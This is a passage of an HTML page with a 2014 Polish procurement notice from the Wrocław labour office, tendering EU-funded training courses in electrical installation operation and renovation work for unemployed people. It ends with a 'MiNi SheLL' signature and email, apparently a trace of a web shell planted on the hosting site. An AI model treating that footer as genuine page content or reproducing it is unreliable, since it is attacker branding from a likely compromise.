Zamawiającego. Kwalifikacje i doświadczenie nowych osób muszą być co najmniej równe jak u osób zastępowanych. Zmiana opiekunów uczestników praktyk dotyczy Zadania nr 2,
2) zmiany w harmonogramie zajęć z przyczyn losowych, pod warunkiem zachowania terminu realizacji umowy, za zgodą Zamawiającego,
3) zmiany miejsc przeprowadzenia szkolenia, w tym miejsca organizacji praktyk u pracodawców,             w szczególnie uzasadnionych przypadkach niezależnych od Wykonawcy, po uzyskaniu pisemnej zgody Zamawiającego. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, nie później niż 7 dni przed terminem rozpoczęcia praktyk, wskazując propozycje miejsca szkolenia/praktyk na terenie Miasta Wrocław - odpowiednio do danego zadania, o co najmniej porównywalnych warunkach. Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio ze zmiany miejsca szkolenia. Zmiana miejsc praktyk dotyczy Zadania nr 2.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> pup.wroclaw.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy we Wrocławiu, ul. Gliniana 20-22, 50-525 Wrocław, pok. 113 - I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2014 godzina 10:00, miejsce: Powiatowy Urząd Pracy we Wrocławiu, ul. Gliniana 20-22, 50- 525 Wrocław (kancelaria, parter, pok. 04).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenie będzie współfinansowane ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego w ramach projektu Z nami po pracę - Działanie 6.1, Poddziałanie 6.1.3 Programu Operacyjnego Kapitał Ludzki 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Eksploatacja urządzeń i instalacji elektroenergetycznych do 1 kV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zorganizowaniu                   i przeprowadzeniu szkolenia grupowego w zakresie: Eksploatacja urządzeń i instalacji elektroenergetycznych do 1 kV. 
2. Liczba uczestników szkolenia: maksymalnie 28 osób, nie mniej niż 24 osoby, w 2 grupach liczących po 12-14 osób w grupie. 

3. Szkolenie skierowane jest do osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy we Wrocławiu, posiadających wykształcenie zawodowe elektryczne lub mających tytuł robotnika wykwalifikowanego albo mistrza w zawodzie lub mających wykształcenie podstawowe i doświadczenie w pracy elektryka, które zostaną skierowane na kurs przez Zamawiającego po przeprowadzeniu naboru i badań lekarskich stwierdzających brak przeciwwskazań zdrowotnych. 

4. Liczba godzin szkolenia: Szkolenie musi obejmować zajęcia teoretyczne, praktyczne                     i egzamin. Łącznie 122 godziny/grupa. Do czasu trwania szkolenia wlicza się czas przeznaczony na egzamin końcowy.

5. Źródło finansowania: Szkolenie będzie finansowane częściowo ze środków Funduszu Pracy oraz współfinansowane ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego w ramach projektu Z nami po pracę - Działanie 6.1, Poddziałanie 6.1.3 Programu Operacyjnego Kapitał Ludzki 2007-2013.

6. Termin wykonania zamówienia: od dnia podpisania umowy do 28.11.2014r.
Planowany termin rozpoczęcia I grupy szkolenia: II kwartał 2014r.
Planowany termin rozpoczęcia II grupy szkolenia: III kwartał 2014r.

7. Miejsce wykonywania usługi szkoleniowej: Miasto Wrocław.

8. Cel szkolenia:  Celem szkolenia jest przygotowanie uczestników szkolenia do egzaminu na uzyskanie świadectwa kwalifikacyjnego w zakresie eksploatacji wybranych urządzeń                    i instalacji elektroenergetycznych o napięciu do 1 kV oraz zorganizowanie egzaminu zewnętrznego przed Komisją Kwalifikacyjną działającą zgodnie z przepisami Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28.04.2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. Nr 89 poz. 828 z późn. zm.) w celu wydania świadectwa kwalifikacyjnego - uprawniającego do zajmowania się eksploatacją urządzeń, instalacji sieci na stanowisku eksploatacji (pod warunkiem pozytywnego zdania tego egzaminu).  

9. Zakres szkolenia musi obejmować co najmniej zagadnienia, o których mowa w § 6 Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28.04.2003r.                          w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. Nr 89 poz. 828 z późn. zm.) w tym:
- zasady budowy, działania  oraz warunki techniczne obsługi urządzeń, instalacji i sieci,
- zasady eksploatacji oraz instrukcja eksploatacji urządzeń, instalacji i sieci,
- zasady i warunki wykonywania prac kontrolno-pomiarowych i montażowych,
- zasady i wymagania bezpieczeństwa pracy i ochrony przeciwpożarowej oraz nauka                          
  udzielania pierwszej pomocy,
- instrukcja postępowania w razie awarii, pożaru lub innego zagrożenia bezpieczeństwa obsługi urządzeń lub zagrożenia życia, zdrowia i środowiska.

	Program szkolenia winien być opracowany zgodnie z § 75 ust. 4 rozporządzenia Ministra 	Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków 	prowadzenia usług rynku pracy (Dz. U. Nr 177 poz. 1193 z późn. zm.).


10. Organizacja szkolenia:
10.1 Szkolenie należy zrealizować według planu nauczania. Zajęcia muszą obejmować 40 godzin zegarowych w tygodniu. Jedną godzinę Zamawiający rozumie jako 60 minut z czego na zajęcia edukacyjne przypada 45 minut  a na przerwę 15 minut, przy czym długość przerw może być ustalona w sposób elastyczny;
10.2 Zajęcia muszą się odbywać w godz. między 08.00 - 18.00 od poniedziałku do piątku            (z wyłączeniem niedziel, świąt oraz dni ustawowo wolnych od pracy), w kolejno następujących po sobie dniach, liczba godzin dziennie nie może przekroczyć 8.                           W wyjątkowych sytuacjach dopuszczalne jest przeprowadzenie zajęć w soboty. 
10.3 Wykonawca przygotuje program szkolenia zawierający zakres, o którym mowa w pkt. 9. Egzamin końcowy musi być integralną częścią programu oraz wchodzić w skład ilości godzin przewidzianych programem. Egzamin końcowy musi być ujęty w Programie szkolenia w pozycji Plan nauczania z uwzględnieniem ilości godzin przewidzianych na ten egzamin oraz w harmonogramie szkolenia z uwzględnieniem daty przeprowadzenia tego egzaminu i ilości godzin przewidzianych na egzamin;
10.4 Wykonawca wyznaczy osobę odpowiedzialną za organizację szkolenia, kontakty                 z uczestnikami szkolenia oraz z Zamawiającym;
10.5 Wszystkie zajęcia muszą być przeprowadzone osobiście przez kadrę dydaktyczną wskazaną w ofercie. Nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metodą        e-learningu, w formie eksternistycznej itp.;
10.6 Zajęcia muszą się odbywać w sali przystosowanej do przeprowadzenia zajęć teoretycznych i praktycznych. Sala szkoleniowa musi być przestronna, jasno oświetlona, dostosowana do liczby uczestników szkolenia, spełniać warunki zgodne z przepisami dotyczącymi bezpieczeństwa i higieny pracy oraz ochrony przeciwpożarowej, zawierać osobne miejsca do siedzenia dla każdego uczestnika szkolenia umożliwiające swobodne sporządzanie notatek (stolik, ławka bądź krzesło z przystawką) oraz musi być wyposażona  w sprzęt techniczny niezbędny do sprawnego prowadzenia zajęć (tj. tablica, rzutnik, flipchart, itp.). W ramach zajęć praktycznych dla każdego uczestnika szkolenia muszą być zapewnione odpowiednie materiały tj. kable i przewody różnego rodzaju, gniazdka, wyłączniki, dzwonki, bezpieczniki itp. W budynku, w którym odbywają się zajęcia zapewniony musi być dostęp do pomieszczeń sanitarnych (w tym dostęp do WC zaopatrzonego w środki higieniczne) oraz do zaplecza socjalnego;
10.7 Wykonawca ma obowiązek ubezpieczyć uczestników szkolenia wskazanych przez Zamawiającego, od następstw nieszczęśliwych wypadków, powstałych w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem;
10.8 Na pierwszych zajęciach Wykonawca przedstawi każdemu uczestnikowi program szkolenia i harmonogram realizowanych zajęć na cały okres szkolenia;
10.9 Każdy uczestnik szkolenia otrzyma od Wykonawcy na własność co najmniej jeden  podręcznik/skrypt z zakresu obejmującego treści szkolenia (nie może być kserowany), inne materiały szkoleniowe i dydaktyczne, artykuły piśmiennicze w postaci zeszytu, długopisu. Dodatkowe materiały (np. skrypty, materiały ksero dotyczące tematyki zajęć, które muszą być czytelne, estetycznie wykonane i dobrej jakości) mogą być przekazywane w trakcie zajęć, zgodnie z ich tematyką; 
10.10 Wykonawca zobowiązany jest do prowadzenia dokumentacji szkolenia (oddzielnie dla każdego źródła finansowania) obejmującej: dziennik zajęć edukacyjnych, indywidualne listy obecności uczestników szkolenia, karty ocen z okresowych sprawdzianów efektów kształcenia, protokół z egzaminu końcowego, rejestr wydanych certyfikatów i świadectw kwalifikacyjnych oraz zobowiązany jest do sprawowania nadzoru nad frekwencją uczestników szkolenia;
10.11 Wykonawca oznaczy budynek oraz pomieszczenia, w których realizowane jest szkolenie poprzez wywieszenie plakatów zawierających informacje o współfinansowaniu szkolenia ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego w ramach projektu Z nami po pracę. Informacja o współfinansowaniu powinna być umieszczona       w widocznym miejscu i czytelna dla wszystkich osób uczestniczących w szkoleniu. Plakaty dostarczone będą przez Zamawiającego. Oznaczenia o współfinansowaniu ze środków unijnych winny być również umieszczone na wszystkich materiałach szkoleniowych, podręcznikach i dokumentacji szkoleniowej osób, których szkolenie będzie współfinansowane ze środków Unii Europejskiej;
10.12 Wykonawca zobowiązany jest do indywidualizacji kształcenia poprzez prowadzenie systematycznej oceny postępów poszczególnych uczestników szkolenia i zwiększania pomocy wobec osób mających trudności w procesie nauczania;
10.13 W trakcie szkolenia (najpóźniej w połowie) oraz po jego zakończeniu Wykonawca przeprowadzi wśród wszystkich uczestników ocenę szkolenia za pomocą formularza anonimowej ankiety oceniającej dostarczonej przez Zamawiającego w dniu podpisania umowy;
10.14 Po zakończeniu szkolenia Wykonawca zapewni przeprowadzenie w sposób bezstronny   i obiektywny egzaminu potwierdzającego nabycie umiejętności, przynajmniej w formie testu wiedzy lub kompetencji przez podmiot/instytucję zewnętrzną lub Wykonawcę szkolenia              z wyłączeniem osób prowadzących szkolenie;
10.15 Wykonawca wyda absolwentom szkolenia, których szkolenie współfinansowane będzie ze środków EFS, po jego pozytywnym zakończeniu, certyfikat z oceną końcową potwierdzający ukończenie szkolenia, zawierający logo Unii Europejskiej, logo PO KL oraz nazwę projektu.
Wzór certyfikatu zgodnego z wytycznymi EFS PO KL Zamawiający przekaże Wykonawcy      w dniu podpisania umowy;
10.16 Wykonawca zorganizuje w ramach szkolenia przeprowadzenie egzaminu państwowego przed Komisją Kwalifikacyjną, a po jego pozytywnym zakończeniu przekaże absolwentom szkolenia świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji, stanowiące załącznik do rozporządzenia Ministra Gospodarki i Pracy z dnia 20 lipca 2005r. zmieniającego rozporządzenie w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. Nr 141, poz. 1189). 
Wzór wydanego świadectwa Wykonawca dołącza do oferty;
10.17 Przedmiot zamówienia nie obejmuje świadczenia przez Wykonawcę usług cateringowych na rzecz uczestniczących w szkoleniu osób bezrobotnych skierowanych przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prace remontowo-budowlane         z podstawami stolarki okiennej i drzwiowej oraz elementami prowadzenia działalności gospodarczej + 4-tygodniowa praktyka u pracodawcy (w pełnym wymiarze czasu pracy).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zorganizowaniu                   i przeprowadzeniu szkolenia grupowego w zakresie: Prace remontowo-budowlane         z podstawami stolarki okiennej i drzwiowej oraz elementami prowadzenia działalności gospodarczej + 4-tygodniowa praktyka u pracodawcy (w pełnym wymiarze czasu pracy).

2. Liczba uczestników szkolenia: maksymalnie 24 osoby, nie mniej niż 20 osób, w 2 grupach liczących po 10-12 osób w grupie.  

3. Szkolenie skierowane jest do osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy we Wrocławiu, z wykształceniem minimum podstawowym, które zostaną skierowane na kurs przez Zamawiającego po przeprowadzeniu naboru i badań lekarskich stwierdzających brak przeciwwskazań zdrowotnych.

4. Liczba godzin szkolenia: Szkolenie musi obejmować zajęcia teoretyczne, praktyczne, egzamin i praktykę u pracodawcy. Łącznie 480 godzin/grupa, tj. 320 godzin zajęć teoretyczno-praktycznych przeprowadzanych przez instytucję szkoleniową (część stacjonarna) i 160 godzin praktyki u pracodawcy. Do czasu trwania szkolenia wlicza się czas przeznaczony na końcowy egzamin.

5. Źródło finansowania: Szkolenie będzie finansowane częściowo ze środków Funduszu Pracy oraz współfinansowane ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego w ramach projektu Z nami po pracę - Działanie 6.1, Poddziałanie 6.1.3 Programu Operacyjnego Kapitał Ludzki 2007-2013.

6. Termin wykonania zamówienia: od dnia podpisania umowy do 28.11.2014r.
Planowany termin rozpoczęcia I grupy szkolenia: II kwartał 2014r.
Planowany termin rozpoczęcia II grupy szkolenia: II/III kwartał 2014r.
Zamawiający zastrzega możliwość rozpoczęcia kolejnej grupy szkolenia przed upływem terminu zakończenia szkolenia poprzedniej grupy.

7. Miejsce wykonywania usługi szkoleniowej: Miasto Wrocław.

8. Cel szkolenia: Celem szkolenia jest nabycie przez uczestników szkolenia wiedzy teoretycznej oraz umiejętności praktycznych w zakresie robót remontowo-budowlanych, które przyczynią się do podjęcia pracy w przedsiębiorstwach remontowo-budowlanych lub do podjęcia własnej działalności gospodarczej w branży budowlanej oraz praktyczne wykorzystanie zdobytej wiedzy i umiejętności poprzez odbycie praktyki u pracodawcy.

9. Zakres szkolenia musi obejmować co najmniej następujące zagadnienia:
Moduł I: Prace remontowo-budowlane - 224 godziny
- zasady i wymagania bezpieczeństwa pracy i ochrony przeciwpożarowej oraz nauka  
  udzielania pierwszej pomocy przedlekarskiej,
- rysunek techniczny i czytanie dokumentacji technicznej,
- materiałoznawstwo w zakresie surowców i materiałów powszechnie używanych do robót    
  remontowo-wykończeniowych, 
- maszyny i narzędzia używane w pracach remontowo-budowlanych,
- techniki i technologie wykończenia wnętrz,
- magazynowanie i konserwacja sprzętu i materiałów,
- przygotowanie podłoża do malowania (m. in. naprawa ubytków, pęknięć, gładzenie,  
   gruntowanie powierzchni),
- wykonanie powłok malarskich,
- wykonanie i przygotowanie podkładu wraz z izolacją pod posadzki i glazurę,
- wykonanie posadzek z płytek oraz okładzin z płytek ceramicznych (m. in. obróbka płytek,  
   przyklejanie płytek na zaprawie cementowej i klejowej, spoinowanie),
- wymiana i montaż urządzeń sanitarnych,
- wydzielenie pomieszczeń z zastosowaniem ścianek szkieletowych z płyt kartonowo- 
  gipsowych,
- prace porządkowe,
 Moduł II: Stolarka okienna i drzwiowa - 80 godzin
- maszynoznawstwo, obsługa narzędzi i  maszyn stosowanych w stolarce okiennej                       i  drzwiowej,
- materiałoznawstwo,
- pomiarowanie, planowanie prac,
- demontaż stolarki drzwiowej i okiennej,
- montaż stolarki drzwiowej i okiennej,
- obróbka drzwi i okien, 
Moduł III: Podstawy przedsiębiorczości - 16 godzin
- regulacje prawne związane z prowadzeniem małego biznesu, biznes plan własnego przedsiębiorstwa, procedura rejestracji firmy, pozyskiwanie środków na rozwój firmy),
Moduł IV: Praktyka u pracodawcy zgodnie z kierunkiem szkolenia - 160 godzin.

Program szkolenia powinien wykorzystywać standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępne w bazach danych prowadzonych przez Ministerstwo Pracy i Polityki Społecznej znajdujących się na stronie internetowej: www.standardyiszkolenia.praca.gov.pl.

10. Organizacja szkolenia:
10.1 Szkolenie należy zrealizować według planu nauczania obejmującego 40 godzin zegarowych w tygodniu. Jedną godzinę Zamawiający rozumie jako 60 minut  z czego na zajęcia edukacyjne przypada 45 minut a na przerwę 15 minut, przy czym długość przerw może być ustalona w sposób elastyczny, praktyka u pracodawcy musi odbywać się w pełnym wymiarze czasu pracy tj. po 8 godzin zegarowych dziennie;
10.2 Zajęcia muszą się odbywać w godz. między 07.00 - 19.00 (praktyka może być realizowana w innych godzinach, jednak w ramach godzin pracy danego zakładu pracy, wyłączając godziny nocne)od poniedziałku do piątku (z wyłączeniem niedziel, świąt oraz dni ustawowo wolnych od pracy), w kolejno następujących po sobie dniach, liczba godzin dziennie nie może przekroczyć 8. W wyjątkowych sytuacjach dopuszczalne jest przeprowadzenie zajęć w soboty. Praktyka u pracodawcy musi rozpocząć się w pierwszym dniu roboczym po zakończeniu zajęć teoretyczno-praktycznych odbywających się w instytucji szkoleniowej;
10.3 Wykonawca przygotuje program szkolenia zawierający zakres, o którym mowa w pkt. 9. Egzamin końcowy musi być integralną częścią programu oraz wchodzić w skład ilości godzin przewidzianych programem. Egzamin końcowy musi być ujęty w Programie szkolenia w pozycji Plan nauczania z uwzględnieniem ilości godzin przewidzianych na ten egzamin oraz w harmonogramie szkolenia z uwzględnieniem daty przeprowadzenia tego egzaminu i ilości godzin przewidzianych na egzamin;
10.4 Wykonawca wyznaczy osobę odpowiedzialną za organizację szkolenia, kontakty           z uczestnikami szkolenia oraz z Zamawiającym;
10.5 Wszystkie zajęcia muszą być przeprowadzone osobiście przez kadrę dydaktyczną wskazaną w ofercie. Nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metodą             e-learningu, w formie eksternistycznej itp.;
10.6 Sala wykładowa musi być przestronna, jasno oświetlona, dostosowana do liczby uczestników szkolenia, spełniać warunki zgodne z przepisami dotyczącymi bezpieczeństwa     i higieny pracy oraz ochrony przeciwpożarowej, z osobnymi miejscami do siedzenia dla każdego uczestnika szkolenia umożliwiającymi swobodne sporządzanie notatek (stolik, ławka bądź krzesło z przystawką) oraz musi być wyposażona w sprzęt techniczny niezbędny do sprawnego prowadzenia zajęć (tj. tablica, rzutnik, flipchart, itp.). Do przeprowadzenia zajęć praktycznych, należy zapewnić co najmniej jedno pomieszczenie o powierzchni min. 50m2 spełniające warunki zgodne z przepisami dotyczącymi bezpieczeństwa i higieny pracy oraz ochrony przeciwpożarowej, niezbędne materiały budowlane, sprawny sprzęt, maszyny          i narzędzia w ilości i jakości koniecznej do prawidłowego wykonania tej części szkolenia     (w tym farby, płytki ścienne i podłogowe, gładź szpachlowa, cement, żwir, kleje do płytek, płyty g-k, pędzle, wałki, packi, kielnie, poziomice, mieszadła wolnoobrotowe, wiertarki udarowe, piły elektryczne do cięcia płyt, klucze sanitarne, okna, drzwi itp.) oraz inne potrzebne zdaniem Wykonawcy materiały i narzędzia, w ilości niezbędnej do prawidłowego przeprowadzenia szkolenia dla całej grupy uczestników szkolenia. Każdy  uczestnik  szkolenia  musi  mieć  swobodny  dostęp  i  możliwość  wykorzystania  i  pracy  na  sprzęcie, maszynach, narzędziach i materiałach, zapewnionych do przeprowadzenia zajęć praktycznych.
W budynku, w którym odbywają się zajęcia zapewniony musi być dostęp do pomieszczeń sanitarnych (w tym dostęp do WC zaopatrzonego w środki higieniczne) oraz do zaplecza socjalnego;
10.7 Wykonawca zakupi i przekaże każdemu uczestnikowi szkolenia na pierwszych zajęciach praktycznych bezzwrotne, nowe indywidualne środki ochrony w postaci odzieży roboczej tj. spodni i bluzy roboczej, obuwia roboczego, czapki, rękawic, maski i okularów ochronnych. 
Uwaga: W przypadku zużycia odzieży roboczej Wykonawca zobowiązany jest niezwłocznie wymienić ją na nową;
10.8 Wykonawca ma obowiązek ubezpieczyć uczestników szkolenia, wskazanych przez Zamawiającego, od następstw nieszczęśliwych wypadków, powstałych w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem;
10.9 Na pierwszych zajęciach Wykonawca przedstawi każdemu uczestnikowi szkolenia program szkolenia, w tym wykaz miejsc praktyk u pracodawców i harmonogram realizowanych zajęć na cały okres szkolenia;
10.10 Każdy uczestnik szkolenia otrzyma od Wykonawcy na własność co najmniej jeden podręcznik z zakresu obejmującego treści szkolenia (nie może być kserowany), inne materiały szkoleniowe i dydaktyczne, artykuły piśmiennicze w postaci zeszytu, długopisu. Dodatkowe materiały (np. skrypty, materiały ksero dotyczące tematyki zajęć, które muszą być czytelne, estetycznie wykonane i dobrej jakości) mogą być przekazywane w trakcie zajęć, zgodnie z ich tematyką;
10.11 Wykonawca oznaczy budynek oraz pomieszczenia, w których realizowane jest szkolenie poprzez wywieszenie plakatów zawierających informacje o współfinansowaniu szkolenia ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego w ramach projektu Z nami po pracę. Informacja o współfinansowaniu powinna być umieszczona       w widocznym miejscu i czytelna dla wszystkich osób uczestniczących w szkoleniu. Plakaty dostarczone będą przez Zamawiającego. Oznaczenia o współfinansowaniu ze środków unijnych winny być również umieszczone na wszystkich materiałach szkoleniowych, podręcznikach i dokumentacji szkoleniowej osób, których szkolenie będzie współfinansowane ze środków Unii Europejskiej;
10.12 Wykonawca zobowiązany jest do prowadzenia dokumentacji szkolenia (oddzielnie dla każdego źródła finansowania) obejmującej: dziennik zajęć edukacyjnych, indywidualne listy obecności uczestników szkolenia, protokoły z egzaminów, karty ocen z okresowych sprawdzianów efektów kształcenia, rejestr wydanych certyfikatów, zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i nabycie umiejętności oraz do sprawowania nadzoru nad frekwencją uczestników szkolenia;
10.13 Wykonawca zobowiązany jest do indywidualizacji kształcenia poprzez prowadzenie systematycznej oceny postępów poszczególnych uczestników szkolenia i zwiększania pomocy wobec osób mających trudności w procesie nauczania;
10.14 W trakcie szkolenia (najpóźniej w połowie) oraz po jego zakończeniu Wykonawca przeprowadzi wśród wszystkich uczestników ocenę szkolenia za pomocą formularza anonimowej ankiety oceniającej dostarczonej przez Zamawiającego w dniu podpisania umowy;
10.15 Po zakończeniu szkolenia Wykonawca zapewni przeprowadzenie w sposób bezstronny i obiektywny egzaminu potwierdzającego nabycie umiejętności. Egzamin ma być przeprowadzony przynajmniej w formie testu wiedzy lub kompetencji przez podmiot/instytucję zewnętrzną lub Wykonawcę szkolenia, z wyłączeniem osób prowadzących dane szkolenie;
10.16 Wykonawca wyda absolwentom szkolenia, po jego pozytywnym zakończeniu:
a) zaświadczenie lub inny dokument potwierdzający ukończenie szkolenia i nabycie umiejętności zawierające, o ile przepisy odrębne nie stanowią inaczej, zgodnie                    z wymaganiami określonymi w § 75 ust. 3 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177 poz. 1193 z późn. zm.): numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i nabycie umiejętności, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie. W przypadku wydania zaświadczenia zgodnego ze wzorem określonym w § 18 ust. 2 rozporządzenia Ministra Edukacji Narodowej z dn. 11 stycznia 2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012r., poz. 186 z późn. zm.) należy dołączyć do zaświadczenia suplement zawierający następujące informacje: okres trwania szkolenia, tematy i wymiar godzin zajęć edukacyjnych oraz numer z rejestru zaświadczenia, do którego suplement jest dodatkiem, wraz z podpisem osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie. Wzór zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia Wykonawca dołącza do oferty,
b) w przypadku osób, których szkolenie współfinansowane będzie ze środków EFS dodatkowo wyda certyfikat z oceną końcową potwierdzający ukończenie szkolenia, zawierający logo Unii Europejskiej, logo PO KL oraz nazwę projektu. Wzór certyfikatu zgodnego z wytycznymi EFS PO KL Zamawiający przekaże Wykonawcy w dniu podpisania umowy;
10.17 W ramach realizowanego zamówienia Wykonawca musi zapewnić dla wszystkich uczestników szkolenia miejsca praktyk u pracodawcy. Wykonawca musi wskazać nazwy        i adresy pracodawców, u których będą realizowane praktyki oraz opiekunów uczestników praktyk. Wykonawca winien wskazać w ofercie co najmniej trzech pracodawców, u których realizowana będzie praktyka. Poprzez określenie praktyka u pracodawcy Zamawiający rozumie odbycie u wskazanych przez Wykonawcę pracodawców praktyki polegającej na możliwości zastosowania w praktyce wiedzy i umiejętności zdobytych przez uczestników szkolenia podczas zajęć teoretycznych i praktycznych. Praktyka musi być realizowana                w warunkach rzeczywistych.
Wykaz miejsc praktyk oraz oświadczenia pracodawców (w oryginale) o zobowiązaniu przyjęcia na praktykę Wykonawca załącza do oferty;
10.18 Przedmiot zamówienia nie obejmuje świadczenia przez Wykonawcę usług cateringowych na rzecz uczestniczących w szkoleniu osób bezrobotnych skierowanych przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com